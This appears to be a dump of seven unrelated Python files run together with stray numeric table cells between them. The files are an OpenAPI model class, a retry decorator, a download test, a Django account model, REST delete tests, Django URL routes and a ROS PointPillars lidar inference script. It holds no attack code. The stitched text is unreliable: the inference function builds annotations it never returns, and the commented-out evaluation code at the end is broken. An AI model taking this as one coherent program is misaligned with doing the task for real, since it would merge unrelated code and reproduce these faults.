    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    """
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    openapi_types = {
        'dry_run': 'bool',
        'infos': 'list[V1alpha1Info]',
        'manifests': 'list[str]',
        'name': 'str',
        'prune': 'bool',
        'resources': 'list[V1alpha1SyncOperationResource]',
        'retry_strategy': 'V1alpha1RetryStrategy',
        'revision': 'str',
        'strategy': 'V1alpha1SyncStrategy'
    }
    attribute_map = {
        'dry_run': 'dryRun',
        'infos': 'infos',
        'manifests': 'manifests',
        'name': 'name',
        'prune': 'prune',
        'resources': 'resources',
        'retry_strategy': 'retryStrategy',
        'revision': 'revision',
        'strategy': 'strategy'
    }

    def __init__(self, dry_run=None, infos=None, manifests=None, name=None, prune=None, resources=None, retry_strategy=None, revision=None, strategy=None, local_vars_configuration=None):  # noqa: E501
        """ApplicationApplicationSyncRequest - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration
        # Backing fields for the declared properties; only attributes that
        # were explicitly passed (non-None) are set through the setters.
        self._dry_run = None
        self._infos = None
        self._manifests = None
        self._name = None
        self._prune = None
        self._resources = None
        self._retry_strategy = None
        self._revision = None
        self._strategy = None
        self.discriminator = None
        if dry_run is not None:
            self.dry_run = dry_run
        if infos is not None:
            self.infos = infos
        if manifests is not None:
            self.manifests = manifests
        if name is not None:
            self.name = name
        if prune is not None:
            self.prune = prune
        if resources is not None:
            self.resources = resources
        if retry_strategy is not None:
            self.retry_strategy = retry_strategy
        if revision is not None:
            self.revision = revision
        if strategy is not None:
            self.strategy = strategy

    @property
    def dry_run(self):
        """Gets the dry_run of this ApplicationApplicationSyncRequest.  # noqa: E501

        :return: The dry_run of this ApplicationApplicationSyncRequest.  # noqa: E501
        :rtype: bool
        """
        return self._dry_run

    @dry_run.setter
    def dry_run(self, dry_run):
        """Sets the dry_run of this ApplicationApplicationSyncRequest.

        :param dry_run: The dry_run of this ApplicationApplicationSyncRequest.  # noqa: E501
        :type: bool
        """
        self._dry_run = dry_run

    @property
    def infos(self):
        """Gets the infos of this ApplicationApplicationSyncRequest.  # noqa: E501

        :return: The infos of this ApplicationApplicationSyncRequest.  # noqa: E501
        :rtype: list[V1alpha1Info]
        """
        return self._infos

    @infos.setter
    def infos(self, infos):
        """Sets the infos of this ApplicationApplicationSyncRequest.

        :param infos: The infos of this ApplicationApplicationSyncRequest.  # noqa: E501
        :type: list[V1alpha1Info]
        """
        self._infos = infos

    @property
    def manifests(self):
        """Gets the manifests of this ApplicationApplicationSyncRequest.  # noqa: E501

        :return: The manifests of this ApplicationApplicationSyncRequest.  # noqa: E501
        :rtype: list[str]
        """
        return self._manifests

    @manifests.setter
    def manifests(self, manifests):
        """Sets the manifests of this ApplicationApplicationSyncRequest.

        :param manifests: The manifests of this ApplicationApplicationSyncRequest.  # noqa: E501
        :type: list[str]
        """
        self._manifests = manifests

    @property
    def name(self):
        """Gets the name of this ApplicationApplicationSyncRequest.  # noqa: E501

        :return: The name of this ApplicationApplicationSyncRequest.  # noqa: E501
        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """Sets the name of this ApplicationApplicationSyncRequest.

        :param name: The name of this ApplicationApplicationSyncRequest.  # noqa: E501
        :type: str
        """
        self._name = name

    @property
    def prune(self):
        """Gets the prune of this ApplicationApplicationSyncRequest.  # noqa: E501

        :return: The prune of this ApplicationApplicationSyncRequest.  # noqa: E501
        :rtype: bool
        """
        return self._prune

    @prune.setter
    def prune(self, prune):
        """Sets the prune of this ApplicationApplicationSyncRequest.

        :param prune: The prune of this ApplicationApplicationSyncRequest.  # noqa: E501
        :type: bool
        """
        self._prune = prune

    @property
    def resources(self):
        """Gets the resources of this ApplicationApplicationSyncRequest.  # noqa: E501

        :return: The resources of this ApplicationApplicationSyncRequest.  # noqa: E501
        :rtype: list[V1alpha1SyncOperationResource]
        """
        return self._resources

    @resources.setter
    def resources(self, resources):
        """Sets the resources of this ApplicationApplicationSyncRequest.

        :param resources: The resources of this ApplicationApplicationSyncRequest.  # noqa: E501
        :type: list[V1alpha1SyncOperationResource]
        """
        self._resources = resources

    @property
    def retry_strategy(self):
        """Gets the retry_strategy of this ApplicationApplicationSyncRequest.  # noqa: E501

        :return: The retry_strategy of this ApplicationApplicationSyncRequest.  # noqa: E501
        :rtype: V1alpha1RetryStrategy
        """
        return self._retry_strategy

    @retry_strategy.setter
    def retry_strategy(self, retry_strategy):
        """Sets the retry_strategy of this ApplicationApplicationSyncRequest.

        :param retry_strategy: The retry_strategy of this ApplicationApplicationSyncRequest.  # noqa: E501
        :type: V1alpha1RetryStrategy
        """
        self._retry_strategy = retry_strategy

    @property
    def revision(self):
        """Gets the revision of this ApplicationApplicationSyncRequest.  # noqa: E501

        :return: The revision of this ApplicationApplicationSyncRequest.  # noqa: E501
        :rtype: str
        """
        return self._revision

    @revision.setter
    def revision(self, revision):
        """Sets the revision of this ApplicationApplicationSyncRequest.

        :param revision: The revision of this ApplicationApplicationSyncRequest.  # noqa: E501
        :type: str
        """
        self._revision = revision

    @property
    def strategy(self):
        """Gets the strategy of this ApplicationApplicationSyncRequest.  # noqa: E501

        :return: The strategy of this ApplicationApplicationSyncRequest.  # noqa: E501
        :rtype: V1alpha1SyncStrategy
        """
        return self._strategy

    @strategy.setter
    def strategy(self, strategy):
        """Sets the strategy of this ApplicationApplicationSyncRequest.

        :param strategy: The strategy of this ApplicationApplicationSyncRequest.  # noqa: E501
        :type: V1alpha1SyncStrategy
        """
        self._strategy = strategy

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively serialise nested models and containers of models
        # (anything exposing its own to_dict()).
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        # Equality is structural: compare the serialised dict forms.
        if not isinstance(other, ApplicationApplicationSyncRequest):
            return False
        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, ApplicationApplicationSyncRequest):
            return True
        return self.to_dict() != other.to_dict()
| 9,578 | 2,770 |
"""
This module contains the retry decorator, which can be used as
``Node`` decorators to retry nodes. See ``kedro.pipeline.node.decorate``
"""
import logging
from functools import wraps
from time import sleep
from typing import Callable, Type
def retry(
    exceptions: Type[Exception] = Exception, n_times: int = 1, delay_sec: float = 0
) -> Callable:
    """
    Catches exceptions from the wrapped function, retries it, and finally
    bundles and propagates the collected errors.

    **Make sure your function does not mutate the arguments**

    Args:
        exceptions: The superclass of exceptions to catch.
            By default catch all exceptions.
        n_times: Number of retries after the initial attempt, i.e. the
            function is invoked at most ``n_times + 1`` times before the last
            exception is propagated. By default retry only once.
        delay_sec: Delay between failure and next retry in seconds.

    Returns:
        The original function with retry functionality.
    """

    def _retry(func: Callable):
        @wraps(func)
        def _wrapper(*args, **kwargs):
            remaining = n_times
            errors = []
            while remaining >= 0:
                try:
                    return func(*args, **kwargs)
                # pylint: disable=broad-except
                except exceptions as exc:
                    errors.append(exc)
                    # No delay after the final failed attempt.
                    if remaining != 0:
                        sleep(delay_sec)
                remaining -= 1
            if errors:
                log = logging.getLogger(__name__)
                # Fix: report the actual number of failed attempts
                # (len(errors) == n_times + 1), not the retry count.
                log.error(
                    "Function `%s` failed %i times. Errors:\n",
                    func.__name__,
                    len(errors),
                )
                log.error("\n".join(str(err) for err in errors))
                log.error("Raising last exception")
                raise errors[-1]

        return _wrapper

    return _retry
| 1,818 | 476 |
"""Test the ability to download files.
Test target:
- :py:meth:`lmp.dset._base.BaseDset.download`.
"""
import os
from typing import Callable
import pytest
import lmp.dset._base
import lmp.util.path
@pytest.fixture
def file_url() -> str:
    """Download target file URL.

    A small text file hosted on GitHub so both download tests stay fast.
    """
    return 'https://raw.githubusercontent.com/ProFatXuanAll/language-model-playground/main/README.rst'
@pytest.fixture
def file_path(clean_dir_finalizer_factory: Callable[[str], None], exp_name: str, file_url: str, request) -> str:
    """Download file path.

    After testing, clean up files and directories created during test.
    """
    # Create temporary directory.
    abs_dir_path = os.path.join(lmp.util.path.DATA_PATH, exp_name)
    if not os.path.exists(abs_dir_path):
        os.makedirs(abs_dir_path)
    # The downloaded file is named after the last URL path segment.
    abs_file_path = os.path.join(abs_dir_path, file_url.split(r'/')[-1])
    # Register cleanup so the directory is removed even when the test fails.
    request.addfinalizer(clean_dir_finalizer_factory(abs_dir_path))
    return abs_file_path
def test_download_as_text_file(file_path: str, file_url: str) -> None:
    """Must be able to download file and output as text file."""
    lmp.dset._base.BaseDset.download_file(mode='text', download_path=file_path, url=file_url)
    # Success criterion: the file exists on disk afterwards.
    assert os.path.exists(file_path)
def test_download_as_binary_file(file_path: str, file_url: str) -> None:
    """Must be able to download file and output as binary file."""
    lmp.dset._base.BaseDset.download_file(mode='binary', download_path=file_path, url=file_url)
    # Success criterion: the file exists on disk afterwards.
    assert os.path.exists(file_path)
| 1,470 | 531 |
"""account models."""
from django.contrib.auth.hashers import (
check_password, make_password
)
from django.db import models
from extension.modelutils import RandomFixedCharField
class Account(models.Model):
    """Minimal account model that stores a hashed password.

    Field verbose names are in Chinese to match the admin UI.
    """
    # Random fixed-length public identifier, generated on creation.
    uid = RandomFixedCharField('编号', max_length=32, unique=True)
    username = models.CharField('用户名', max_length=32, unique=True)
    # Holds the hashed password (see set_password), never the raw one.
    password = models.CharField('密码', max_length=80)
    create_time = models.DateTimeField('创建时间', auto_now_add=True)
    update_time = models.DateTimeField('修改时间', auto_now=True)

    def __str__(self):
        return self.username

    class Meta:
        """Meta."""
        verbose_name = '用户'
        verbose_name_plural = '用户'

    def set_password(self, raw_password):
        """Hash *raw_password* and store it on the instance (does not save)."""
        self.password = make_password(raw_password)

    def check_password(self, raw_password):
        """Compare *raw_password* against the stored hash.

        The *setter* callback lets Django transparently re-hash and persist
        the password when the hashing parameters have been upgraded.
        """
        def setter(raw_password):
            self.set_password(raw_password)
            self.save(update_fields=['password'])
        return check_password(raw_password, self.password, setter)
| 1,019 | 316 |
# -*- coding: utf-8 -*-
import json
import unittest
from .. import MoviesTest
class TestDeleteResource(MoviesTest):
    """DELETE on a single movie resource (plain and nested routes)."""

    def setUp(self):
        # NOTE(review): calling setUpClass() from setUp rebuilds the class
        # fixtures before every test — confirm this per-test reset is intended.
        self.setUpClass()
        super(TestDeleteResource, self).setUp()

    def test_delete_invalid_id(self):
        # 'a1' is not a valid resource id -> 409 with an explanatory message.
        response = self.app.delete('/%s/movies/a1' % self.api, headers=self.headers)
        self.assertEqual(response.status_code, 409)
        self.assertDictContainsSubset({'message': u'Resource "a1" is invalid'}, json.loads(response.data))

    def test_delete_not_found_id(self):
        # A movie id used against the actors collection must yield 404.
        response = self.app.delete('/%s/actors/%s' % (self.api, self.movies[0]['id']), headers=self.headers)
        self.assertEqual(response.status_code, 404)
        response_json = json.loads(response.data)
        self.assertDictContainsSubset(
            {'message': u'Resource "%s" not found' % self.movies[0]['id']},
            response_json
        )

    def test_delete(self):
        response = self.app.delete('/%s/movies/%s' % (self.api, self.movies[0]['id']), headers=self.headers)
        self.assertEqual(response.status_code, 204)
        # Two movies remain and the deleted one is gone from the listing.
        response_json = self._count_test('movies', 2)
        self.assertNotIn(self.movies[0], response_json.get('items'))

    def test_delete_nested(self):
        response = self.app.delete(
            '/%s/actors/%s/movies/%s' % (self.api, self.actors[0]['id'], self.movies[0]['id']),
            headers=self.headers
        )
        self.assertEqual(response.status_code, 204)
        response_json = self._count_test('movies', 2)
        self.assertNotIn(self.movies[0], response_json.get('items'))
class TestDeleteCollection(MoviesTest):
    """DELETE on whole movie collections (plain and nested routes)."""

    def setUp(self):
        # NOTE(review): calling setUpClass() from setUp rebuilds the class
        # fixtures before every test — confirm this per-test reset is intended.
        self.setUpClass()
        super(TestDeleteCollection, self).setUp()

    def test_delete(self):
        response = self.app.delete('/%s/movies' % self.api, headers=self.headers)
        self.assertEqual(response.status_code, 204)
        # Deleting the whole collection leaves an empty listing.
        response_json = self._count_test('movies', 0)
        self.assertEqual([], response_json.get('items'))

    def test_delete_nested(self):
        response = self.app.delete(
            '/%s/actors/%s/movies' % (self.api, self.actors[0]['id']),
            headers=self.headers
        )
        self.assertEqual(response.status_code, 204)
        # Only the first actor's movies are removed; two other movies remain.
        response_json = self._count_test('movies', 2)
        self.assertNotIn(self.movies[0], response_json.get('items'))
if __name__ == '__main__':
    # Allow running this module directly with the stdlib test runner.
    unittest.main()
| 2,420 | 810 |
from django.urls import path, re_path
from drf_yasg import openapi
from drf_yasg.views import get_schema_view
from rest_framework.routers import SimpleRouter, DefaultRouter
from rest_framework_simplejwt import views as jwt_views
from api.views import *
# The router generates the URL patterns for the viewset so they don't have
# to be written out by hand.
router = SimpleRouter()
router.register("baskets", BasketViewSet, "baskets")

# drf-yasg schema view serving the OpenAPI document and the two UIs below.
schema_view = get_schema_view(
    openapi.Info(
        title="Snippets API",
        default_version="v1",
        description="Test description",
        terms_of_service="https://www.google.com/policies/terms/",
        contact=openapi.Contact(email="contact@snippets.local"),
        license=openapi.License(name="BSD License"),
    ),
    public=True,
)

urlpatterns = [
    path("check/", check_api_view, name="check-api"),
    path("token/", jwt_views.TokenObtainPairView.as_view(), name="token-obtain-pair"),
    path("token/refresh/", jwt_views.TokenRefreshView.as_view(), name="token-refresh"),
    *router.urls,
    re_path(r"swagger(?P<format>\.json|\.yaml)$", schema_view.without_ui(cache_timeout=0), name="schema-json"),
    path("swagger/", schema_view.with_ui("swagger", cache_timeout=0), name="schema-swagger-ui"),
    path("redoc/", schema_view.with_ui("redoc", cache_timeout=0), name="schema-redoc"),
]
| 1,347 | 456 |
# -*- coding: utf-8 -*-
import os
import argparse
import pathlib
import pickle
import shutil
import time
from functools import partial
import sys
sys.path.append('../')
from pathlib import Path
import fire
import numpy as np
import torch
import torch.nn as nn
import os
print(torch.__version__)
print(os.environ['PYTHONPATH'])
from google.protobuf import text_format
import rospy
from sensor_msgs.msg import PointCloud2
import sensor_msgs.point_cloud2 as pc2
from std_msgs.msg import Header
from jsk_recognition_msgs.msg import BoundingBox, BoundingBoxArray
import torchplus
import second.data.kitti_common as kitti
from second.builder import target_assigner_builder, voxel_builder
from second.data.preprocess import merge_second_batch
from second.protos import pipeline_pb2
from second.pytorch.builder import (box_coder_builder, input_reader_builder,
lr_scheduler_builder, optimizer_builder,
second_builder)
from second.utils.eval import get_coco_eval_result, get_official_eval_result
from second.utils.progress_bar import ProgressBar
def get_paddings_indicator(actual_num, max_num, axis=0):
    """
    Create a boolean mask marking the real (non-padded) entries of a padded tensor.

    :param actual_num: tensor holding the true element count per row
    :param max_num: padded size along the masked dimension
    :param axis: axis of ``actual_num`` against which the mask is built
    :return: tensor that is True where the position index is below ``actual_num``
    """
    counts = torch.unsqueeze(actual_num, axis + 1)
    # Shape like counts but with -1 on the padded axis, e.g. (1, max_num).
    view_shape = [1] * len(counts.shape)
    view_shape[axis + 1] = -1
    positions = torch.arange(
        max_num, dtype=torch.int, device=counts.device).view(view_shape)
    # Broadcast compare: position < count  ->  entry is real data.
    # e.g. counts [[3],[4],[2]] vs positions [[0,1,2,3,4]].
    return counts.int() > positions
def _get_pos_neg_loss(cls_loss, labels):
# cls_loss: [N, num_anchors, num_class]
# labels: [N, num_anchors]
batch_size = cls_loss.shape[0]
if cls_loss.shape[-1] == 1 or len(cls_loss.shape) == 2:
cls_pos_loss = (labels > 0).type_as(cls_loss) * cls_loss.view(
batch_size, -1)
cls_neg_loss = (labels == 0).type_as(cls_loss) * cls_loss.view(
batch_size, -1)
cls_pos_loss = cls_pos_loss.sum() / batch_size
cls_neg_loss = cls_neg_loss.sum() / batch_size
else:
cls_pos_loss = cls_loss[..., 1:].sum() / batch_size
cls_neg_loss = cls_loss[..., 0].sum() / batch_size
return cls_pos_loss, cls_neg_loss
def _flat_nested_json_dict(json_dict, flatted, sep=".", start=""):
for k, v in json_dict.items():
if isinstance(v, dict):
_flat_nested_json_dict(v, flatted, sep, start + sep + k)
else:
flatted[start + sep + k] = v
def flat_nested_json_dict(json_dict, sep=".") -> dict:
    """Flatten a nested json-like dict, joining nested keys with *sep*.

    This function makes a shallow copy: leaf values are shared with the
    input. Top-level scalar keys keep their plain name; keys under a nested
    dict are emitted as ``parent<sep>child`` by the private helper.
    """
    flatted = {}
    for k, v in json_dict.items():
        if isinstance(v, dict):
            _flat_nested_json_dict(v, flatted, sep, k)
        else:
            flatted[k] = v
    return flatted
def example_convert_to_torch(example, dtype=torch.float32, device=None) -> dict:
    """Convert the numpy fields of an example dict to CUDA torch tensors.

    Keys not listed below are passed through unchanged. The *device*
    parameter is currently unused (tensors always go through ``.cuda()``).
    """
    # device = device or torch.device("cuda:0")
    # float_names = ["voxels", "anchors", "reg_targets", "reg_weights", "bev_map", "rect", "Trv2c", "P2"]
    float_keys = ("voxels", "anchors", "reg_targets", "reg_weights", "bev_map")
    int_keys = ("coordinates", "labels", "num_points")
    converted = {}
    for key, value in example.items():
        if key in float_keys:
            converted[key] = torch.as_tensor(value, dtype=dtype).cuda()
        elif key in int_keys:
            converted[key] = torch.as_tensor(value, dtype=torch.int32).cuda()
        elif key in ("anchors_mask",):
            # torch.uint8 is now deprecated, please use a dtype torch.bool instead
            converted[key] = torch.as_tensor(value, dtype=torch.uint8).cuda()
        else:
            converted[key] = value
    return converted
def _make_point_field(num_field):
    """Build the PointField layout for published clouds.

    Returns the x/y/z/intensity fields, plus a label field when
    ``num_field`` != 4.

    Fix: ``np.str`` was a deprecated alias of the builtin ``str`` and was
    removed in NumPy 1.24, so the field names are now plain Python strings
    (identical values at runtime).
    """
    msg_pf1 = pc2.PointField()
    msg_pf1.name = 'x'
    msg_pf1.offset = np.uint32(0)
    msg_pf1.datatype = np.uint8(7)
    msg_pf1.count = np.uint32(1)
    msg_pf2 = pc2.PointField()
    msg_pf2.name = 'y'
    msg_pf2.offset = np.uint32(4)
    msg_pf2.datatype = np.uint8(7)
    msg_pf2.count = np.uint32(1)
    msg_pf3 = pc2.PointField()
    msg_pf3.name = 'z'
    msg_pf3.offset = np.uint32(8)
    msg_pf3.datatype = np.uint8(7)
    msg_pf3.count = np.uint32(1)
    msg_pf4 = pc2.PointField()
    msg_pf4.name = 'intensity'
    msg_pf4.offset = np.uint32(16)
    msg_pf4.datatype = np.uint8(7)
    msg_pf4.count = np.uint32(1)
    if num_field == 4:
        return [msg_pf1, msg_pf2, msg_pf3, msg_pf4]
    msg_pf5 = pc2.PointField()
    msg_pf5.name = 'label'
    msg_pf5.offset = np.uint32(20)
    msg_pf5.datatype = np.uint8(4)
    msg_pf5.count = np.uint32(1)
    return [msg_pf1, msg_pf2, msg_pf3, msg_pf4, msg_pf5]
def publish_test(np_p_ranged, frame_id):
    """Publish an (N, 3) or (N, 4) point array as a PointCloud2 on ``pub_points``.

    When no intensity column is present, a zero column is appended.
    """
    header = Header()
    header.stamp = rospy.Time()
    header.frame_id = frame_id
    x = np_p_ranged[:, 0].reshape(-1)
    y = np_p_ranged[:, 1].reshape(-1)
    z = np_p_ranged[:, 2].reshape(-1)
    if np_p_ranged.shape[1] == 4:
        i = np_p_ranged[:, 3].reshape(-1)
    else:
        # Fix: np.zeros(n, 1) passed 1 as the dtype argument and raised a
        # TypeError; the intent is an all-zero intensity vector of length n.
        i = np.zeros(np_p_ranged.shape[0], dtype=np_p_ranged.dtype)
    cloud = np.stack((x, y, z, i))
    msg_segment = pc2.create_cloud(header=header,
                                   fields=_make_point_field(4),
                                   points=cloud.T)
    pub_points.publish(msg_segment)
def predict_kitti_to_anno(net,
                          example,
                          class_names,
                          center_limit_range=None,
                          lidar_input=False,
                          global_set=None):
    """Run the network on one example tuple and build KITTI-style annotations.

    NOTE(review): ``anno`` is filled per detection but never appended to
    ``annos``, and the function has no return statement (callers receive
    None). This looks like lost code relative to the upstream
    second.pytorch implementation — confirm before relying on the output.
    """
    # eval example : [0: 'voxels', 1: 'num_points', 2: 'coordinates', 3: 'rect'
    # 4: 'Trv2c', 5: 'P2', 6: 'anchors', 7: 'anchors_mask'
    # 8: 'image_idx', 9: 'image_shape']
    # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
    # 4: 'anchor_mask', 5: 'pc_idx']
    pillar_x = example[0][:, :, 0].unsqueeze(0).unsqueeze(0)
    pillar_y = example[0][:, :, 1].unsqueeze(0).unsqueeze(0)
    pillar_z = example[0][:, :, 2].unsqueeze(0).unsqueeze(0)
    pillar_i = example[0][:, :, 3].unsqueeze(0).unsqueeze(0)
    num_points_per_pillar = example[1].float().unsqueeze(0)
    # Find distance of x, y, and z from pillar center
    # assuming xyres_16.proto
    coors_x = example[2][:, 3].float()
    coors_y = example[2][:, 2].float()
    # NOTE(review): 0.16 / -22.96 are presumably the voxel size and range
    # offsets from the xyres_16 config — must stay in sync with the proto.
    x_sub = coors_x.unsqueeze(1) * 0.16 -22.96 #+ 0.08#-22.96#+ 0.08#-22.96#-19.76
    y_sub = coors_y.unsqueeze(1) * 0.16 -22.96#- 19.76 #-22.96#-19.76#-22.96#-19.76
    ones = torch.ones([1, 100], dtype=torch.float32, device=pillar_x.device)
    x_sub_shaped = torch.mm(x_sub, ones).unsqueeze(0).unsqueeze(0)
    y_sub_shaped = torch.mm(y_sub, ones).unsqueeze(0).unsqueeze(0)
    num_points_for_a_pillar = pillar_x.size()[3]
    # Mask marking the real (non-padded) points in each pillar.
    mask = get_paddings_indicator(num_points_per_pillar, num_points_for_a_pillar, axis=0)
    mask = mask.permute(0, 2, 1)
    mask = mask.unsqueeze(1)
    mask = mask.type_as(pillar_x)
    coors = example[2]
    anchors = example[3]
    anchors_mask = example[4]
    anchors_mask = torch.as_tensor(anchors_mask, dtype=torch.uint8, device=pillar_x.device)
    anchors_mask = anchors_mask.byte()
    # rect = example[3]
    # Trv2c = example[4]
    # P2 = example[5]
    pc_idx = example[5]
    input = [pillar_x, pillar_y, pillar_z, pillar_i,
             num_points_per_pillar, x_sub_shaped, y_sub_shaped,
             mask, coors, anchors, anchors_mask, pc_idx]
    predictions_dicts = net(input)
    # lidar_box, final_score, label_preds, pc_idx
    annos = []
    for i, preds_dict in enumerate(predictions_dicts):
        # image_shape = batch_image_shape[i]
        pc_idx = preds_dict[3]
        if preds_dict[0] is not None:  # bbox list
            # box_2d_preds = preds_dict[0].detach().cpu().numpy() # bbox
            # box_preds = preds_dict[1].detach().cpu().numpy() # bbox3d_camera
            scores = preds_dict[1].detach().cpu().numpy()  # scores
            box_preds_lidar = preds_dict[0].detach().cpu().numpy()  # box3d_lidar
            # write pred to file
            label_preds = preds_dict[2].detach().cpu().numpy()  # label_preds
            anno = kitti.get_start_result_anno()
            num_example = 0
            content = ''
            for box_lidar, score, label in zip(
                    box_preds_lidar, scores, label_preds):
                if center_limit_range is not None:
                    # Drop detections whose centre lies outside the range.
                    limit_range = np.array(center_limit_range)
                    if (np.any(box_lidar[:3] < limit_range[:3])
                            or np.any(box_lidar[:3] > limit_range[3:])):
                        continue
                content += str(label) + " 0.0 0 0.0 0.0 0.0 0.0 0.0 " + str(box_lidar[5]) + " " + str(box_lidar[3]) + " "\
                    + str(box_lidar[4]) + " " + str(box_lidar[0]) + " " + str(box_lidar[1]) + " " + str(box_lidar[2]) + " " + str(box_lidar[6]) + " " + str(score) + "\n"
                anno["name"].append(class_names[int(label)])
                anno["truncated"].append(0.0)
                anno["occluded"].append(0)
                anno["alpha"].append(-np.arctan2(-box_lidar[1], box_lidar[0]) +
                                     box_lidar[6])
                anno["bbox"].append(np.array([0, 0, 0, 0]))
                anno["dimensions"].append([box_lidar[4], box_lidar[5], box_lidar[3]])  # annotate by shl
                # anno["dimensions"].append(box_lidar[3:6])
                anno["location"].append(box_lidar[:3])
                anno["rotation_y"].append(box_lidar[6])
                if global_set is not None:
                    # Nudge duplicate scores down until unique in the set.
                    for i in range(100000):
                        if score in global_set:
                            score -= 1 / 100000
                        else:
                            global_set.add(score)
                            break
                anno["score"].append(score)
                num_example += 1
            content = content.strip()
def delete_nan_points(points):
    """Return *points* with every row whose x, y or z coordinate is NaN removed.

    Fix: the original built the result with
    ``np.row_stack((new_points, points[i]))`` but discarded the return value
    (numpy operations are not in-place), so it always returned an empty
    array. A boolean mask performs the same filtering correctly and
    vectorised; the debug print is dropped.
    """
    valid = ~np.isnan(points[:, :3]).any(axis=1)
    return points[valid]
def callback(msg):
    """ROS subscriber callback: run the network on one incoming point cloud.

    Relies on module-level globals assigned in ``__main__``: net, input_cfg,
    model_cfg, voxel_generator, target_assigner, class_names and
    center_limit_range.
    """
    # NOTE(review): arr_bbox is created but never filled or published —
    # confirm whether box publishing was meant to happen here.
    arr_bbox = BoundingBoxArray()
    # pcl_msg = pc2.read_points(msg, skip_nans=False, field_names=("x", "y", "z", "intensity", "ring"))
    pcl_msg = pc2.read_points(msg, skip_nans=False, field_names=("x", "y", "z"))
    # pcl_msg = pc2.read_points(msg, skip_nans=True)
    # print(pcl_msg)
    np_p = np.array(list(pcl_msg), dtype=np.float32)
    # Append a zero intensity column so the array becomes (N, 4).
    np_p = np.column_stack((np_p, np.zeros((np_p.shape[0], 1))))
    print(np_p)
    # np_p = np.delete(np_p, -1, 1) # delete "ring" field
    # np_p = delete_nan_points(np_p)
    # Build a one-shot dataset/dataloader around the live points.
    eval_dataset = input_reader_builder.build(
        input_cfg,
        model_cfg,
        training=False,
        voxel_generator=voxel_generator,
        target_assigner=target_assigner,
        inference=True,
        points=np_p)
    eval_dataloader = torch.utils.data.DataLoader(
        eval_dataset,
        batch_size=input_cfg.batch_size,
        shuffle=False,
        num_workers=input_cfg.num_workers,
        pin_memory=False,
        collate_fn=merge_second_batch)
    net.eval()
    global_set = None
    eval_data = iter(eval_dataloader)
    example = next(eval_data)
    example = example_convert_to_torch(example, torch.float32)
    example_tuple = list(example.values())
    # pc_idx arrives as a numpy array; the model expects a tensor.
    example_tuple[5] = torch.from_numpy(example_tuple[5])
    result = predict_kitti_to_anno(net, example_tuple, class_names, center_limit_range, model_cfg.lidar_input, global_set)
    print("result", result)
# def evaluate(config_path,
# model_dir,
# result_path=None,
# predict_test=False,
# ckpt_path=None,
# ref_detfile=None,
# pickle_result=True,
# read_predict_pkl_path=None):
#
# model_dir = str(Path(model_dir).resolve())
# if predict_test:
# result_name = 'predict_test'
# else:
# result_name = 'eval_results'
# if result_path is None:
# model_dir = Path(model_dir)
# result_path = model_dir / result_name
# else:
# result_path = pathlib.Path(result_path)
#
# if isinstance(config_path, str):
# config = pipeline_pb2.TrainEvalPipelineConfig()
# with open(config_path, "r") as f:
# proto_str = f.read()
# text_format.Merge(proto_str, config)
# else:
# config = config_path
#
# input_cfg = config.eval_input_reader
# model_cfg = config.model.second
# train_cfg = config.train_config
# class_names = list(input_cfg.class_names)
# center_limit_range = model_cfg.post_center_limit_range
# #########################
# # Build Voxel Generator
# #########################
# voxel_generator = voxel_builder.build(model_cfg.voxel_generator)
# bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]
# box_coder = box_coder_builder.build(model_cfg.box_coder)
# target_assigner_cfg = model_cfg.target_assigner
# target_assigner = target_assigner_builder.build(target_assigner_cfg,
# bv_range, box_coder)
#
# net = second_builder.build(model_cfg, voxel_generator, target_assigner, input_cfg.batch_size)
# net.cuda()
# if train_cfg.enable_mixed_precision:
# net.half()
# net.metrics_to_float()
# net.convert_norm_to_float(net)
#
# if ckpt_path is None:
# torchplus.train.try_restore_latest_checkpoints(model_dir, [net])
# else:
# torchplus.train.restore(ckpt_path, net)
#
# eval_dataset = input_reader_builder.build(
# input_cfg,
# model_cfg,
# training=False,
# voxel_generator=voxel_generator,
# target_assigner=target_assigner)
#
# eval_dataloader = torch.utils.data.DataLoader(
# eval_dataset,
# batch_size=input_cfg.batch_size,
# shuffle=False,
# num_workers=input_cfg.num_workers,
# pin_memory=False,
# collate_fn=merge_second_batch)
#
# if train_cfg.enable_mixed_precision:
# float_dtype = torch.float16
# else:
# float_dtype = torch.float32
#
# net.eval()
# result_path_step = result_path / f"step_{net.get_global_step()}"
# result_path_step.mkdir(parents=True, exist_ok=True)
# t = time.time()
# dt_annos = []
# global_set = None
# eval_data = iter(eval_dataloader)
# example = next(eval_data)
# example = example_convert_to_torch(example, float_dtype)
# example_tuple = list(example.values())
# example_tuple[5] = torch.from_numpy(example_tuple[5])
# if (example_tuple[3].size()[0] != input_cfg.batch_size):
# continue
#
# dt_annos += predict_kitti_to_anno(
# net, example_tuple, class_names, center_limit_range,
# model_cfg.lidar_input, global_set)
# for example in iter(eval_dataloader):
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinates', 3: 'rect'
# # 4: 'Trv2c', 5: 'P2', 6: 'anchors', 7: 'anchors_mask'
# # 8: 'image_idx', 9: 'image_shape']
#
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
# # 4: 'anchor_mask', 5: 'pc_idx']
# example = example_convert_to_torch(example, float_dtype)
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
